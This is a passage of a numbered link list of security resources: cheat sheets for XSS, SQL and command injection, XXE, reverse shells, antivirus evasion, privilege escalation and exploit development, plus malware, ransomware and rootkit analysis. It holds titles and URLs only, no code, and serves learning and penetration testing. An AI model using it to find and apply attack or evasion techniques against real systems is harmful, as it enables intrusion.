-913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf -927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: 